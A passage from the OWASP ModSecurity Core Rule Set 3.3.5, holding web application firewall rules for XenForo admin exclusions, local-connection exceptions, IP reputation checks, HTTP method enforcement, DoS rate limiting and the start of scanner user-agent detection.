ver:'OWASP_CRS/3.3.5'" # Admin batch thread update # POST /xf/admin.php?threads/batch-update/action SecRule REQUEST_URI "@rx /admin\.php\?(?:threads|users)/batch-update/action$" \ "id:9006940,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=942200;ARGS:criteria,\ ctl:ruleRemoveTargetById=942260;ARGS:criteria,\ ctl:ruleRemoveTargetById=942330;ARGS:criteria,\ ctl:ruleRemoveTargetById=942340;ARGS:criteria,\ ctl:ruleRemoveTargetById=942370;ARGS:criteria,\ ver:'OWASP_CRS/3.3.5'" # Edit forum theme # POST /xf/admin.php?styles/title.1234/style-properties/group&group=basic SecRule REQUEST_URI "@rx /admin\.php\?styles/" \ "id:9006950,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetById=942200;ARGS:json,\ ctl:ruleRemoveTargetById=942260;ARGS:json,\ ctl:ruleRemoveTargetById=942300;ARGS:json,\ ctl:ruleRemoveTargetById=942330;ARGS:json,\ ctl:ruleRemoveTargetById=942340;ARGS:json,\ ctl:ruleRemoveTargetById=942370;ARGS:json,\ ctl:ruleRemoveTargetById=942440;ARGS:json,\ ver:'OWASP_CRS/3.3.5'" # Set forum options # POST /xf/admin.php?options/update SecRule REQUEST_URI "@rx /admin\.php\?options/update" \ "id:9006960,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:options[boardInactiveMessage],\ ver:'OWASP_CRS/3.3.5'" # Edit pages/templates # POST /xf/admin.php?pages/0/save # POST /xf/admin.php?pages/foo.12345/save # POST /xf/admin.php?templates/foo.1234/save SecRule REQUEST_URI "@rx /admin\.php\?(?:pages|templates)/.*/save" \ "id:9006970,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:template,\ ver:'OWASP_CRS/3.3.5'" SecMarker "END-XENFORO-ADMIN" SecMarker "END-XENFORO" modsecurity-crs-3.3.5/rules/REQUEST-905-COMMON-EXCEPTIONS.conf000066400000000000000000000031311446122515100227660ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # This file is used as an exception mechanism to remove common false positives # that may be encountered. # # Exception for Apache SSL pinger # SecRule REQUEST_LINE "@streq GET /" \ "id:905100,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "t:none,\ ctl:ruleEngine=Off,\ ctl:auditEngine=Off" # # Exception for Apache internal dummy connection # SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "id:905110,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \ "t:none,\ chain" SecRule REQUEST_LINE "@rx ^(?:GET /|OPTIONS \*) HTTP/[12]\.[01]$" \ "t:none,\ ctl:ruleEngine=Off,\ ctl:auditEngine=Off" modsecurity-crs-3.3.5/rules/REQUEST-910-IP-REPUTATION.conf000066400000000000000000000242421446122515100223210ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910011,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:910012,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ IP Reputation Block Flag Check ]=- # # The first check we do is to see if the client IP address has already # been blacklisted by rules from previous requests. # # If the rule matches, it will do a skipAfter and pick up processing # at the end of the request phase for actual blocking. # SecRule TX:DO_REPUT_BLOCK "@eq 1" \ "id:910000,\ phase:2,\ block,\ t:none,\ msg:'Request from Known Malicious Client (Based on previous traffic violations)',\ logdata:'Previous Block Reason: %{ip.reput_block_reason}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain,\ skipAfter:BEGIN-REQUEST-BLOCKING-EVAL" SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ GeoIP Checks ]=- # # This rule requires activating the SecGeoLookupDB directive # in the crs-setup.conf file and specifying # the list of blocked countries (tx.high_risk_country_codes). # # This rule does a GeoIP resolution on the client IP address. # SecRule TX:HIGH_RISK_COUNTRY_CODES "!@rx ^$" \ "id:910100,\ phase:2,\ block,\ t:none,\ msg:'Client IP is from a HIGH Risk Country Location',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain" SecRule TX:REAL_IP "@geoLookup" \ "chain" SecRule GEO:COUNTRY_CODE "@within %{tx.high_risk_country_codes}" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" # # -=[ IP Reputation Checks ]=- # # ModSecurity Rules from Trustwave SpiderLabs: IP Blacklist Alert # Ref: http://www.modsecurity.org/projects/commercial/rules/ # # This rule checks the client IP address against a list of recent IPs captured # from the SpiderLabs web honeypot systems (last 48 hours). # #SecRule TX:REAL_IP "@ipMatchFromFile ip_blacklist.data" \ # "id:910110,\ # phase:2,\ # block,\ # t:none,\ # msg:'Client IP in Trustwave SpiderLabs IP Reputation Blacklist',\ # tag:'application-multi',\ # tag:'language-multi',\ # tag:'platform-multi',\ # tag:'attack-reputation-ip',\ # tag:'paranoia-level/1',\ # severity:'CRITICAL',\ # setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ # setvar:'ip.reput_block_flag=1',\ # setvar:'ip.reput_block_reason=%{rule.msg}',\ # expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" # # First check if we have already run an @rbl check for this IP by checking in IP collection. # If we have, then skip doing another check. # SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" \ "id:910120,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-RBL-LOOKUP" # # Check Client IP against ProjectHoneypot's HTTP Blacklist # Ref: http://www.projecthoneypot.org/httpbl_api.php # # To use the blacklist, you must register for an HttpBL API Key # and choose the traffic types to block. See section # "Project Honey Pot HTTP Blacklist" in crs-setup.conf. # # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey # # Skip HttpBL checks if user has not defined one of the TX:block_* variables. # This prevents error "Operator error: RBL httpBl called but no key defined: set SecHttpBlKey" SecRule &TX:block_suspicious_ip "@eq 0" \ "id:910130,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ chain,\ skipAfter:END-RBL-CHECK" SecRule &TX:block_harvester_ip "@eq 0" \ "chain" SecRule &TX:block_spammer_ip "@eq 0" \ "chain" SecRule &TX:block_search_ip "@eq 0" SecRule TX:REAL_IP "@rbl dnsbl.httpbl.org" \ "id:910140,\ phase:2,\ pass,\ capture,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.httpbl_msg=%{tx.0}',\ chain" SecRule TX:httpbl_msg "@rx RBL lookup of .*?.dnsbl.httpbl.org succeeded at TX:checkip. (.*?): .*" \ "capture,\ t:none,\ setvar:'tx.httpbl_msg=%{tx.1}'" # The following regexs are generated based off re_operators.c SecRule TX:block_search_ip "@eq 1" \ "id:910150,\ phase:2,\ block,\ t:none,\ msg:'HTTP Blacklist match for search engine IP',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" SecRule TX:httpbl_msg "@rx Search Engine" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ expirevar:'ip.previous_rbl_check=86400'" SecRule TX:block_spammer_ip "@eq 1" \ "id:910160,\ phase:2,\ block,\ t:none,\ msg:'HTTP Blacklist match for spammer IP',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" SecRule TX:httpbl_msg "@rx (?i)^.*? spammer .*?$" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ expirevar:'ip.previous_rbl_check=86400'" SecRule TX:block_suspicious_ip "@eq 1" \ "id:910170,\ phase:2,\ block,\ t:none,\ msg:'HTTP Blacklist match for suspicious IP',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" SecRule TX:httpbl_msg "@rx (?i)^.*? suspicious .*?$" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ expirevar:'ip.previous_rbl_check=86400'" SecRule TX:block_harvester_ip "@eq 1" \ "id:910180,\ phase:2,\ block,\ t:none,\ msg:'HTTP Blacklist match for harvester IP',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ chain,\ skipAfter:END-RBL-CHECK" SecRule TX:httpbl_msg "@rx (?i)^.*? harvester .*?$" \ "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\ expirevar:'ip.previous_rbl_check=86400'" SecAction \ "id:910190,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-ip',\ ver:'OWASP_CRS/3.3.5',\ setvar:'ip.previous_rbl_check=1',\ expirevar:'ip.previous_rbl_check=86400'" SecMarker "END-RBL-LOOKUP" SecMarker "END-RBL-CHECK" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910013,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910014,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910015,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910016,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910017,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910018,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-910-IP-REPUTATION" modsecurity-crs-3.3.5/rules/REQUEST-911-METHOD-ENFORCEMENT.conf000066400000000000000000000051741446122515100230500ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Allowed Request Methods ]=- # # tx.allowed_methods is defined in the crs-setup.conf file # SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ "id:911100,\ phase:2,\ block,\ msg:'Method is not allowed by policy',\ logdata:'%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-generic',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/274',\ tag:'PCI/12.1',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-911-METHOD-ENFORCEMENT" modsecurity-crs-3.3.5/rules/REQUEST-912-DOS-PROTECTION.conf000066400000000000000000000246541446122515100224430ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # Anti-Automation rules to detect Denial of Service attacks. # # Description of mechanics: # When a request hits a non-static resource (TX:STATIC_EXTENSIONS), then a counter for the IP # address is being raised (IP:DOS_COUNTER). If the counter (IP:DOS_COUNTER) hits a limit # (TX:DOS_COUNTER_THRESHOLD), then a burst is identified (IP:DOS_BURST_COUNTER) and the # counter (IP:DOS_COUNTER) is reset. The burst counter expires within a timeout period # (TX:DOS_BURST_TIME_SLICE). # If the burst counter (IP:DOS_BURST_COUNTER) is greater equal 2, then the blocking flag # is being set (IP:DOS_BLOCK). The blocking flag (IP:DOS_BLOCK) expires within a timeout # period (TX:DOS_BLOCK_TIMEOUT). All this counting happens in phase 5. # There is a stricter sibling to this rule (912170) in paranoia level 2, where the # burst counter check (IP:DOS_BURST_COUNTER) hits at greater equal 1. # # The blocking is done in phase 1: When the blocking flag is encountered (IP:DOS_BLOCK), # then the request is dropped without sending a response. If this happens, then a # counter is # raised (IP:DOS_BLOCK_COUNTER). # When an IP address is blocked for the first time, then the blocking is reported in a # message and a flag (IP:DOS_BLOCK_FLAG) is set. This flag expires in 60 seconds. # When an IP address is blocked and the flag (IP:DOS_BLOCK_FLAG) is set, then the # blocking is not being reported (to prevent a flood of alerts). When the flag # (IP:DOS_BLOCK_FLAG) has expired and a new request is being blocked, then the # counter (IP:DOS_BLOCK_COUNTER) is being reset to 0 and the block is being treated # as the first block (-> alert). # In order to be able to display the counter (IP:DOS_BLOCK_COUNTER) and resetting # it at the same time, we copy the counter (IP:DOS_BLOCK_COUNTER) into a different # variable (TX:DOS_BLOCK_COUNTER), which is then displayed in turn. # # Variables: # IP:DOS_BLOCK Flag if an IP address should be blocked # IP:DOS_BLOCK_COUNTER Counter of blocked requests # IP:DOS_BLOCK_FLAG Flag keeping track of alert. Flag expires after 60 seconds. # IP:DOS_BURST_COUNTER Burst counter # IP:DOS_COUNTER Request counter (static resources are ignored) # TX:DOS_BLOCK_COUNTER Copy of IP:DOS_BLOCK_COUNTER (needed for display reasons) # TX:DOS_BLOCK_TIMEOUT Period in seconds a blocked IP will be blocked # TX:DOS_COUNTER_THRESHOLD Limit of requests, where a burst is identified # TX:DOS_BURST_TIME_SLICE Period in seconds when we will forget a burst # TX:STATIC_EXTENSIONS Paths which can be ignored with regards to DoS # # As a precondition for these rules, please set the following three variables: # - TX:DOS_BLOCK_TIMEOUT # - TX:DOS_COUNTER_THRESHOLD # - TX:DOS_BURST_TIME_SLICE # # And make sure that TX:STATIC_EXTENSIONS is also set. # # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # # # Skip if variables defining DoS protection are not set # SecRule &TX:dos_burst_time_slice "@eq 0" \ "id:912100,\ phase:1,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain,\ skipAfter:END-DOS-PROTECTION-CHECKS" SecRule &TX:dos_counter_threshold "@eq 0" \ "chain" SecRule &TX:dos_block_timeout "@eq 0" SecRule &TX:dos_burst_time_slice "@eq 0" \ "id:912110,\ phase:5,\ pass,\ t:none,\ nolog,\ ver:'OWASP_CRS/3.3.5',\ chain,\ skipAfter:END-DOS-PROTECTION-CHECKS" SecRule &TX:dos_counter_threshold "@eq 0" \ "chain" SecRule &TX:dos_block_timeout "@eq 0" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912011,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912012,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Anti-Automation / DoS Protection : Block ]=- # # # Block and track # of requests and log # SecRule IP:DOS_BLOCK "@eq 1" \ "id:912120,\ phase:1,\ drop,\ msg:'Denial of Service (DoS) attack identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'paranoia-level/1',\ tag:'attack-dos',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule &IP:DOS_BLOCK_FLAG "@eq 0" \ "setvar:'ip.dos_block_counter=+1',\ setvar:'ip.dos_block_flag=1',\ setvar:'tx.dos_block_counter=%{ip.dos_block_counter}',\ setvar:'ip.dos_block_counter=0',\ expirevar:'ip.dos_block_flag=60'" # # Block and track # of requests but don't log # SecRule IP:DOS_BLOCK "@eq 1" \ "id:912130,\ phase:1,\ drop,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-dos',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ setvar:'ip.dos_block_counter=+1'" # # -=[ Anti-Automation / DoS Protection: Count requests ]=- # # # Skip if we have blocked the request # SecRule IP:DOS_BLOCK "@eq 1" \ "id:912140,\ phase:5,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-dos',\ ver:'OWASP_CRS/3.3.5',\ skipAfter:END-DOS-PROTECTION-CHECKS" # # DOS Counter: Count the number of requests to non-static resources # SecRule REQUEST_BASENAME "@rx .*?(\.[a-z0-9]{1,10})?$" \ "id:912150,\ phase:5,\ pass,\ capture,\ t:none,t:lowercase,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-dos',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ setvar:'tx.extension=/%{TX.1}/',\ chain" SecRule TX:EXTENSION "!@within %{tx.static_extensions}" \ "setvar:'ip.dos_counter=+1'" # # Check DOS Counter # If the request count is greater than or equal to user settings, # we raise the burst counter. This happens via two separate rules: # - 912160: raise from 0 to 1 # - 912161: raise from 1 to 2 # # This approach with two rules avoids raising the burst counter # from 0 to 2 via two concurrent requests. We do not raise the # burst counter beyond 2. # # SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \ "id:912160,\ phase:5,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-dos',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule &IP:DOS_BURST_COUNTER "@eq 0" \ "setvar:'ip.dos_burst_counter=1',\ setvar:'!ip.dos_counter',\ expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'" SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \ "id:912161,\ phase:5,\ pass,\ t:none,\ nolog,\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-dos',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ chain" SecRule &IP:DOS_BURST_COUNTER "@ge 1" \ "setvar:'ip.dos_burst_counter=2',\ setvar:'!ip.dos_counter',\ expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'" # # Check DOS Burst Counter and set Block # Check the burst counter - if greater than or equal to 2, then we set the IP # block variable for a given expiry and issue an alert. # SecRule IP:DOS_BURST_COUNTER "@ge 2" \ "id:912170,\ phase:5,\ pass,\ t:none,\ log,\ msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'paranoia-level/1',\ tag:'attack-dos',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ setvar:'ip.dos_block=1',\ expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912013,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912014,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912019,phase:5,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # # # Check DOS Burst Counter and set Block # Check the burst counter - if greater than or equal to 1, then we set the IP # block variable for a given expiry and issue an alert. # # This is a stricter sibling of rule 912170. # SecRule IP:DOS_BURST_COUNTER "@ge 1" \ "id:912171,\ phase:5,\ pass,\ t:none,\ log,\ msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-dos',\ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/227/469',\ ver:'OWASP_CRS/3.3.5',\ setvar:'ip.dos_block=1',\ expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912015,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912016,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912017,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912018,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-912-DOS-PROTECTION" SecMarker "END-DOS-PROTECTION-CHECKS" modsecurity-crs-3.3.5/rules/REQUEST-913-SCANNER-DETECTION.conf000066400000000000000000000157431446122515100227370ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Vulnerability Scanner Checks ]=- # # These rules inspect the default User-Agent and Header values sent by # various commercial and open source vuln scanners. # # The following rules contain User-Agent lists: # 913100 - security scanners (data file scanners-user-agents.data) # 913101 - scripting/generic HTTP clients (data file scripting-user-agents.data) # 913102 - web crawlers/bots (data file crawlers-user-agents.data) # SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ "id:913100,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'Found User-Agent associated with security scanner',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-reputation-scanner',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'ip.reput_block_flag=1',\ setvar:'ip.reput_block_reason=%{rule.msg}',\ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@pmFromFile scanners-headers.data" \ 